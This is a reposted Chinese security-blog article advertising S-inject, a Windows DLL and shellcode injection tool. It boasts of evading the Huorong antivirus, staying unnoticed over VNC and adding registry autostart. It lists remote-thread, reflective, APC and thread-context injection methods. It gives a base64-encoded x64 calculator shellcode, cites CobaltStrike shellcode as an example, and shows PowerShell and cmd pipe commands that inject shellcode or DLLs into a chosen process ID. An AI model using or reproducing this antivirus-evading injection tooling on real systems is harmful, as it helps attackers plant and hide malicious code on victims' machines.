支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

admin 2024年2月18日15:39:51评论39 views字数 2217阅读7分23秒阅读模式
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

1

工具介绍

DLL+Shellcode的Windows注入免杀工具

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

只是罗列各种方法,免杀搭配其他技巧中要具体灵活使用

须知:

  1. 反射式注入参考了著名github项目:https://github.com/stephenfewer/ReflectiveDLLInjection 该项目为反射式注入支持的DLL
  2. Shellcode使用base64编码后的shellcode
  3. 相关测试的DLL文件在Test Files文件夹中
2

免杀效果

远程shellcode注入等功能可免杀火绒,VNC无感,可注册表添加开机自启动

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

3

支持功能

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

DLL注入

  • 远程线程注入
  • 反射式注入
  • APC调度注入

Shellcode注入

  • 远程线程注入
  • APC调度注入
  • Context上下文注入
  • 可注入进程枚举
4

工具使用

非交互式终端使用管道传参

  • 注意cmd和powershell的区别

  • 注意cmd字符串超过80个会自动换行,推荐搭配powershell

Shellcode注入

这里以64为windows10版本Calc shellcode位例子(虽然会崩溃) shellcode来源:https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode base64编码后shellcode

SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

以CobaltStrike Shellcode为例子

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

关于使用不可交互终端

可以参考 DLL注入:B, 不可交互终端 部分,尝试利用管道加载

#cmd
(echo <option> <base64 Shellcode>) | <S-inject Path>

#powershell
echo "<option index>`n`<pid>`n`<base64 Shellcode>" | <S-inject Path>

#(echo 4`n`16900`n`SDH/SPfnZUiLWGBIi1sYSItbIEiLG0iLG0iLWyBJidiLWzxMAcNIMclmgcH/iEjB6QiLFAtMAcJNMdJEi1IcTQHCTTHbRItaIE0Bw00x5ESLYiRNAcTrMltZSDHASIniUUiLDCRIMf9BizyDTAHHSInW86Z0BUj/wOvmWWZBiwREQYsEgkwBwFPDSDHJgMEHSLgPqJaRuoeanEj30EjB6AhQUeiw////SYnGSDHJSPfhUEi4nJ6TnNGah5pI99BQSInhSP/CSIPsIEH/1g==) |  D:GithubS-injectx64ReleaseS-inject.exe

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

DLL注入

A, 可交互终端

直接在终端中启动,根据菜单选择功能即可,如枚举可注入进程

支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

B, 不可交互终端

因为作者不想增加代码量,单独增添没有必要的参数功能,可以利用管道解决该问题 以下示例使用的注入对象更新前的为x32dbgx64dbg,因为一个软件有两个位数的版本,在x96dbg中可以选择位数,便于测试

如远程线程DLL注入

x64

  • powershell

    echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>
    
    #echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe

    支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

  • cmd

    推荐使用powershell启动

    powershell -c echo "<option index>`n`<DLL Path>`n`<PID>" | <S-inject Path>
    
    #powershell -c echo "1`n`D:GithubS-injectTest FilesTestDll_x64.dll`n`20176" | D:GithubS-injectx64ReleaseS-inject.exe

    支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

    cmd.exe

    (echo <option> <DLL Path> &echo <PID>) | <S-inject Path>
    
    #(echo 1 D:GithubS-injectTest FilesTestDll_x64.dll &echo 22268) | D:GithubS-injectx64ReleaseS-inject.exe
    

    支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

5

工具获取

https://github.com/Joe1sn/S-inject

 

原文始发于微信公众号(李白你好):支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月18日15:39:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具https://cn-sec.com/archives/2501518.html

发表评论

匿名网友 填写信息